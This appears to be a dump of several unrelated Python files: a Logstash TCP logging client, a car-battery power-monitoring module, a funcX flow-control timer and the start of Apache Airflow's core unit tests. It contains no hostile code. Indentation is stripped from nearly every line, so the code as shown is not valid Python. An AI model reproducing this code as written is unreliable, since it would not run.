from queue import Queue, Empty
logger = logging.getLogger('logstash_client')
class LogStashClient(object):
"""
    Logstash client that sends data to a Logstash service over TCP in JSON format
"""
_instance = None
def __init__(self, hostname, port):
self._hostname = hostname
self._port = port
self._queue = Queue()
self._max_batch = 10
def send_data(self, module, data: dict):
data['module'] = module
self._queue.put(data, block=False)
def _process_data(self):
while True:
try:
data_to_send = [self._queue.get(block=True, timeout=10)]
max_batch = self._max_batch
while max_batch > 0:
# check if more data available and batch it
try:
data_to_send.append(self._queue.get_nowait())
max_batch -= 1
except Empty:
break
if not self._hostname or not self._port:
continue
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
sock.connect((self._hostname, self._port))
sock.settimeout(5)
try:
logger.info("Sending {} data chunks to logstash".format(len(data_to_send)))
for data in data_to_send:
                        sock.sendall(json.dumps(data).encode('utf-8'))
finally:
sock.close()
except Empty:
# waiting again for more data
continue
except socket.error as msg:
logger.error("Failed to send data to logstash: {}".format(msg))
except Exception as exc:
logger.exception("Failed to send data to logstash: {}".format(exc))
@staticmethod
def configure_client(hostname, port):
LogStashClient._instance = LogStashClient(hostname, port)
@staticmethod
def start_client():
if not LogStashClient._instance:
raise Exception("LogStashClient should be configured first, call 'configure_client' before.")
thread = threading.Thread(target=LogStashClient._instance._process_data, daemon=True)
thread.start()
@staticmethod
def get_client():
"""
:rtype: LogStashClient
"""
return LogStashClient._instance
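# Usage sketch for the client above; "localhost"/5000 and the module name are
# placeholders, not values the class prescribes. configure_client() must run
# before start_client(), and send_data() only enqueues, so it never blocks.
def _example_usage():
    LogStashClient.configure_client("localhost", 5000)
    LogStashClient.start_client()
    LogStashClient.get_client().send_data("example_module", {"event": "started"})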
|
power_monitoring.py
|
import random
import threading
import time
from statistics import mean
from typing import Optional
from cereal import log
from common.params import Params, put_nonblocking
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE
from selfdrive.swaglog import cloudlog
from selfdrive.statsd import statlog
from selfdrive.car.modules.CFG_module import load_float_param
CAR_VOLTAGE_LOW_PASS_K = 0.091 # LPF gain for 5s tau (dt/tau / (dt/tau + 1))
# A C2 uses about 1W while idling, and 30h seems like a good shutoff for most cars
# While driving, a battery charges completely in about 30-60 minutes
CAR_BATTERY_CAPACITY_uWh = 30e6
CAR_CHARGING_RATE_W = 45
VBATT_PAUSE_CHARGING = 11.0 # Lower limit on the LPF car battery voltage
VBATT_INSTANT_PAUSE_CHARGING = 7.0 # Lower limit on the instant car battery voltage measurements to avoid triggering on instant power loss
MAX_TIME_OFFROAD_S = load_float_param("TinklaShutdownAfter",3.0)*3600
MIN_ON_TIME_S = 3600
class PowerMonitoring:
def __init__(self):
self.params = Params()
self.last_measurement_time = None # Used for integration delta
self.last_save_time = 0 # Used for saving current value in a param
self.power_used_uWh = 0 # Integrated power usage in uWh since going into offroad
self.next_pulsed_measurement_time = None
self.car_voltage_mV = 12e3 # Low-passed version of peripheralState voltage
self.car_voltage_instant_mV = 12e3 # Last value of peripheralState voltage
self.integration_lock = threading.Lock()
car_battery_capacity_uWh = self.params.get("CarBatteryCapacity")
if car_battery_capacity_uWh is None:
car_battery_capacity_uWh = 0
# Reset capacity if it's low
self.car_battery_capacity_uWh = max((CAR_BATTERY_CAPACITY_uWh / 10), int(car_battery_capacity_uWh))
# Calculation tick
def calculate(self, peripheralState, ignition):
try:
now = sec_since_boot()
# If peripheralState is None, we're probably not in a car, so we don't care
if peripheralState is None or peripheralState.pandaType == log.PandaState.PandaType.unknown:
with self.integration_lock:
self.last_measurement_time = None
self.next_pulsed_measurement_time = None
self.power_used_uWh = 0
return
# Low-pass battery voltage
self.car_voltage_instant_mV = peripheralState.voltage
self.car_voltage_mV = ((peripheralState.voltage * CAR_VOLTAGE_LOW_PASS_K) + (self.car_voltage_mV * (1 - CAR_VOLTAGE_LOW_PASS_K)))
statlog.gauge("car_voltage", self.car_voltage_mV / 1e3)
# Cap the car battery power and save it in a param every 10-ish seconds
self.car_battery_capacity_uWh = max(self.car_battery_capacity_uWh, 0)
self.car_battery_capacity_uWh = min(self.car_battery_capacity_uWh, CAR_BATTERY_CAPACITY_uWh)
if now - self.last_save_time >= 10:
put_nonblocking("CarBatteryCapacity", str(int(self.car_battery_capacity_uWh)))
self.last_save_time = now
# First measurement, set integration time
with self.integration_lock:
if self.last_measurement_time is None:
self.last_measurement_time = now
return
if ignition:
# If there is ignition, we integrate the charging rate of the car
with self.integration_lock:
self.power_used_uWh = 0
integration_time_h = (now - self.last_measurement_time) / 3600
if integration_time_h < 0:
raise ValueError(f"Negative integration time: {integration_time_h}h")
self.car_battery_capacity_uWh += (CAR_CHARGING_RATE_W * 1e6 * integration_time_h)
self.last_measurement_time = now
else:
# No ignition, we integrate the offroad power used by the device
is_uno = peripheralState.pandaType == log.PandaState.PandaType.uno
# Get current power draw somehow
current_power = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power is not None:
pass
elif HARDWARE.get_battery_status() == 'Discharging':
# If the battery is discharging, we can use this measurement
# On C2: this is low by about 10-15%, probably mostly due to UNO draw not being factored in
current_power = ((HARDWARE.get_battery_voltage() / 1000000) * (HARDWARE.get_battery_current() / 1000000))
elif (self.next_pulsed_measurement_time is not None) and (self.next_pulsed_measurement_time <= now):
# TODO: Figure out why this is off by a factor of 3/4???
FUDGE_FACTOR = 1.33
# Turn off charging for about 10 sec in a thread that does not get killed on SIGINT, and perform measurement here to avoid blocking thermal
def perform_pulse_measurement(now):
try:
HARDWARE.set_battery_charging(False)
time.sleep(5)
# Measure for a few sec to get a good average
voltages = []
currents = []
for _ in range(6):
voltages.append(HARDWARE.get_battery_voltage())
currents.append(HARDWARE.get_battery_current())
time.sleep(1)
current_power = ((mean(voltages) / 1000000) * (mean(currents) / 1000000))
self._perform_integration(now, current_power * FUDGE_FACTOR)
# Enable charging again
HARDWARE.set_battery_charging(True)
except Exception:
cloudlog.exception("Pulsed power measurement failed")
# Start pulsed measurement and return
threading.Thread(target=perform_pulse_measurement, args=(now,)).start()
self.next_pulsed_measurement_time = None
return
elif self.next_pulsed_measurement_time is None and not is_uno:
# On a charging EON with black panda, or drawing more than 400mA out of a white/grey one
# Only way to get the power draw is to turn off charging for a few sec and check what the discharging rate is
# We shouldn't do this very often, so make sure it has been some long-ish random time interval
self.next_pulsed_measurement_time = now + random.randint(120, 180)
return
else:
# Do nothing
return
# Do the integration
self._perform_integration(now, current_power)
except Exception:
cloudlog.exception("Power monitoring calculation failed")
def _perform_integration(self, t: float, current_power: float) -> None:
with self.integration_lock:
try:
if self.last_measurement_time:
integration_time_h = (t - self.last_measurement_time) / 3600
power_used = (current_power * 1000000) * integration_time_h
if power_used < 0:
raise ValueError(f"Negative power used! Integration time: {integration_time_h} h Current Power: {power_used} uWh")
self.power_used_uWh += power_used
self.car_battery_capacity_uWh -= power_used
self.last_measurement_time = t
except Exception:
cloudlog.exception("Integration failed")
# Get the power usage
def get_power_used(self) -> int:
return int(self.power_used_uWh)
def get_car_battery_capacity(self) -> int:
return int(self.car_battery_capacity_uWh)
# See if we need to disable charging
def should_disable_charging(self, ignition: bool, in_car: bool, offroad_timestamp: Optional[float]) -> bool:
if offroad_timestamp is None:
return False
now = sec_since_boot()
disable_charging = False
disable_charging |= (now - offroad_timestamp) > MAX_TIME_OFFROAD_S
disable_charging |= (self.car_voltage_mV < (VBATT_PAUSE_CHARGING * 1e3)) and (self.car_voltage_instant_mV > (VBATT_INSTANT_PAUSE_CHARGING * 1e3))
disable_charging |= (self.car_battery_capacity_uWh <= 0)
disable_charging &= not ignition
disable_charging &= (not self.params.get_bool("DisablePowerDown"))
disable_charging &= in_car
disable_charging |= self.params.get_bool("ForcePowerDown")
return disable_charging
# See if we need to shutdown
def should_shutdown(self, peripheralState, ignition, in_car, offroad_timestamp, started_seen):
if offroad_timestamp is None:
return False
now = sec_since_boot()
panda_charging = (peripheralState.usbPowerMode != log.PeripheralState.UsbPowerMode.client)
BATT_PERC_OFF = 10
should_shutdown = False
# Wait until we have shut down charging before powering down
should_shutdown |= (not panda_charging and self.should_disable_charging(ignition, in_car, offroad_timestamp))
should_shutdown |= ((HARDWARE.get_battery_capacity() < BATT_PERC_OFF) and (not HARDWARE.get_battery_charging()) and ((now - offroad_timestamp) > 60))
should_shutdown &= started_seen or (now > MIN_ON_TIME_S)
return should_shutdown
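# Worked sketch of the boolean accumulation in should_disable_charging() above:
# "|=" collects independent reasons to stop charging, "&=" applies gates that
# must all hold, and the forced override is OR-ed in last. Values are illustrative.
def _disable_charging_example():
    offroad_for_s = 4 * 3600                 # pretend we have been offroad for 4 hours
    car_voltage_mV = 10500                   # below VBATT_PAUSE_CHARGING * 1e3
    ignition, in_car, force = False, True, False
    disable = False
    disable |= offroad_for_s > MAX_TIME_OFFROAD_S              # offroad too long
    disable |= car_voltage_mV < (VBATT_PAUSE_CHARGING * 1e3)   # car battery sagging
    disable &= not ignition                                    # never while driving
    disable &= in_car                                          # only with harness connected
    disable |= force                                           # manual override wins
    return disable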
|
base.py
|
import logging
import threading
import time
log = logging.getLogger(__name__)
class BaseStrategy:
"""Implements threshold-interval based flow control.
    The overall goal is to trap the flow of apps from the
    workflow, measure it, and redirect it to the appropriate executors for
    processing.
This is based on the following logic:
.. code-block:: none
BEGIN (INTERVAL, THRESHOLD, callback) :
start = current_time()
while (current_time()-start < INTERVAL) :
count = get_events_since(start)
if count >= THRESHOLD :
break
callback()
This logic ensures that the callbacks are activated with a maximum delay
of `interval` for systems with infrequent events as well as systems which would
generate large bursts of events.
Once a callback is triggered, the callback generally runs a strategy
    method on the available sites as well as the task queues.
TODO: When the debug logs are enabled this module emits duplicate messages.
This issue needs more debugging. What I've learnt so far is that the duplicate
messages are present only when the timer thread is started, so this could be
from a duplicate logger being added by the thread.
"""
def __init__(self, *args, threshold=20, interval=5):
"""Initialize the flowcontrol object.
We start the timer thread here
Parameters
----------
- threshold (int) : Tasks after which the callback is triggered
- interval (int) : seconds after which timer expires
"""
self.interchange = None
self.threshold = threshold
self.interval = interval
self.cb_args = args
self.callback = self.strategize
self._handle = None
self._event_count = 0
self._event_buffer = []
self._wake_up_time = time.time() + 1
self._kill_event = threading.Event()
self._thread = threading.Thread(
target=self._wake_up_timer, args=(self._kill_event,), name="Base-Strategy"
)
self._thread.daemon = True
def start(self, interchange):
"""Actually start the strategy
Parameters
----------
interchange: funcx.executors.high_throughput.interchange.Interchange
Interchange to bind the strategy to
"""
self.interchange = interchange
if hasattr(interchange, "provider"):
log.debug(
"Strategy bounds-> init:{}, min:{}, max:{}".format(
interchange.provider.init_blocks,
interchange.provider.min_blocks,
interchange.provider.max_blocks,
)
)
self._thread.start()
def strategize(self, *args, **kwargs):
"""Strategize is called everytime the threshold or the interval is hit"""
log.debug(f"Strategize called with {args} {kwargs}")
def _wake_up_timer(self, kill_event):
"""
Internal. This is the function that the thread will execute.
waits on an event so that the thread can make a quick exit when close() is
called
Args:
- kill_event (threading.Event) : Event to wait on
"""
while True:
prev = self._wake_up_time
# Waiting for the event returns True only when the event
# is set, usually by the parent thread
time_to_die = kill_event.wait(float(max(prev - time.time(), 0)))
if time_to_die:
return
if prev == self._wake_up_time:
self.make_callback(kind="timer")
else:
print("Sleeping a bit more")
def notify(self, event_id):
"""Let the FlowControl system know that there is an event.
This method is to be called from the Interchange to notify the flowcontrol
"""
self._event_buffer.extend([event_id])
self._event_count += 1
if self._event_count >= self.threshold:
log.debug("Eventcount >= threshold")
self.make_callback(kind="event")
def make_callback(self, kind=None):
"""Makes the callback and resets the timer.
KWargs:
- kind (str): Default=None, used to pass information on what
triggered the callback
"""
self._wake_up_time = time.time() + self.interval
self.callback(tasks=self._event_buffer, kind=kind)
self._event_buffer = []
def close(self):
"""Merge the threads and terminate."""
self._kill_event.set()
self._thread.join()
class Timer:
"""This timer is a simplified version of the FlowControl timer.
This timer does not employ notify events.
This is based on the following logic :
.. code-block:: none
BEGIN (INTERVAL, THRESHOLD, callback) :
start = current_time()
while (current_time()-start < INTERVAL) :
wait()
break
callback()
"""
def __init__(self, callback, *args, interval=5):
"""Initialize the flowcontrol object
We start the timer thread here
Args:
- dfk (DataFlowKernel) : DFK object to track parsl progress
KWargs:
- threshold (int) : Tasks after which the callback is triggered
- interval (int) : seconds after which timer expires
"""
self.interval = interval
self.cb_args = args
self.callback = callback
self._wake_up_time = time.time() + 1
self._kill_event = threading.Event()
self._thread = threading.Thread(
target=self._wake_up_timer, args=(self._kill_event,), name="Timer"
)
self._thread.daemon = True
self._thread.start()
def _wake_up_timer(self, kill_event):
"""Internal. This is the function that the thread will execute.
waits on an event so that the thread can make a quick exit when close() is
called
Args:
- kill_event (threading.Event) : Event to wait on
"""
# Sleep till time to wake up
while True:
prev = self._wake_up_time
# Waiting for the event returns True only when the event
# is set, usually by the parent thread
time_to_die = kill_event.wait(float(max(prev - time.time(), 0)))
if time_to_die:
return
if prev == self._wake_up_time:
self.make_callback(kind="timer")
else:
print("Sleeping a bit more")
def make_callback(self, kind=None):
"""Makes the callback and resets the timer."""
self._wake_up_time = time.time() + self.interval
self.callback(*self.cb_args)
def close(self):
"""Merge the threads and terminate."""
self._kill_event.set()
self._thread.join()
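# Hedged usage sketch for Timer (names are illustrative): fire a callback every
# 2 seconds until close() is called. Timer starts its thread in __init__, so no
# explicit start() is needed.
def _timer_example():
    def on_tick():
        log.debug("timer fired")
    t = Timer(on_tick, interval=2)
    time.sleep(7)   # let it fire a few times
    t.close()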
|
core.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import doctest
import json
import multiprocessing
import os
import pickle # type: ignore
import re
import signal
import subprocess
import tempfile
import unittest
import warnings
from datetime import timedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from tempfile import NamedTemporaryFile
from time import sleep
from unittest import mock
import six
import sqlalchemy
from dateutil.relativedelta import relativedelta
from numpy.testing import assert_array_almost_equal
from pendulum import utcnow
from airflow import configuration, models
from airflow import jobs, DAG, utils, macros, settings, exceptions
from airflow.bin import cli
from airflow.configuration import AirflowConfigException, run_command
from airflow.exceptions import AirflowException
from airflow.executors import SequentialExecutor
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.models import BaseOperator, Connection, TaskFail
from airflow.models import (
DagBag,
DagRun,
Pool,
DagModel,
TaskInstance,
Variable,
)
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python_operator import PythonOperator
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.dates import (
days_ago, infer_time_unit, round_time,
scale_time_units
)
from airflow.utils.state import State
from airflow.utils.timezone import datetime
from tests.test_utils.config import conf_vars
NUM_EXAMPLE_DAGS = 19
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
EXAMPLE_DAG_DEFAULT_DATE = days_ago(2)
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super().__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(self, context):
pass
class CoreTest(unittest.TestCase):
TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_no_previous_runs'
TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID = \
TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous'
TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID = \
TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only'
TEST_SCHEDULE_ONCE_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_once'
TEST_SCHEDULE_RELATIVEDELTA_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_relativedelta'
TEST_SCHEDULE_START_END_DATES_DAG_ID = TEST_DAG_ID + 'test_schedule_dag_start_end_dates'
default_scheduler_args = {"num_runs": 1}
def setUp(self):
self.dagbag = DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def tearDown(self):
if os.environ.get('KUBERNETES_VERSION') is not None:
return
dag_ids_to_clean = [
TEST_DAG_ID,
self.TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID,
self.TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID,
self.TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID,
self.TEST_SCHEDULE_ONCE_DAG_ID,
self.TEST_SCHEDULE_RELATIVEDELTA_DAG_ID,
self.TEST_SCHEDULE_START_END_DATES_DAG_ID,
]
session = Session()
session.query(DagRun).filter(
DagRun.dag_id.in_(dag_ids_to_clean)).delete(
synchronize_session=False)
session.query(TaskInstance).filter(
TaskInstance.dag_id.in_(dag_ids_to_clean)).delete(
synchronize_session=False)
session.query(TaskFail).filter(
TaskFail.dag_id.in_(dag_ids_to_clean)).delete(
synchronize_session=False)
session.commit()
session.close()
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(self.TEST_SCHEDULE_WITH_NO_PREVIOUS_RUNS_DAG_ID)
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_relativedelta(self):
"""
Tests scheduling a dag with a relativedelta schedule_interval
"""
delta = relativedelta(hours=+1)
dag = DAG(self.TEST_SCHEDULE_RELATIVEDELTA_DAG_ID,
schedule_interval=delta)
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run2)
self.assertEqual(dag.dag_id, dag_run2.dag_id)
self.assertIsNotNone(dag_run2.run_id)
self.assertNotEqual('', dag_run2.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0) + delta,
dag_run2.execution_date,
msg='dag_run2.execution_date did not match expectation: {0}'
.format(dag_run2.execution_date)
)
self.assertEqual(State.RUNNING, dag_run2.state)
self.assertFalse(dag_run2.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(self.TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID,
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(self.TEST_SCHEDULE_ONCE_DAG_ID)
dag.schedule_interval = '@once'
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(self.TEST_SCHEDULE_START_END_DATES_DAG_ID,
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(BaseOperator(task_id='faketastic', owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for _ in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
now = utcnow()
start_date = now.subtract(weeks=1)
runs = (now - start_date).days
dag = DAG(self.TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID,
start_date=start_date,
schedule_interval=delta)
dag.add_task(BaseOperator(task_id='faketastic', owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for _ in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(configuration.conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
('Invalid arguments were passed to BashOperator '
'(task_id: test_illegal_args).'),
w[0].message.args[0])
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command="echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_on_failure_callback(self):
# Annoying workaround for nonlocal not existing in python 2
data = {'called': False}
def check_failure(context, test_case=self):
data['called'] = True
error = context.get('exception')
test_case.assertIsInstance(error, AirflowException)
t = BashOperator(
task_id='check_on_failure_callback',
bash_command="exit 1",
dag=self.dag,
on_failure_callback=check_failure)
self.assertRaises(
exceptions.AirflowException,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
self.assertTrue(data['called'])
def test_trigger_dagrun(self):
def trigga(context, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
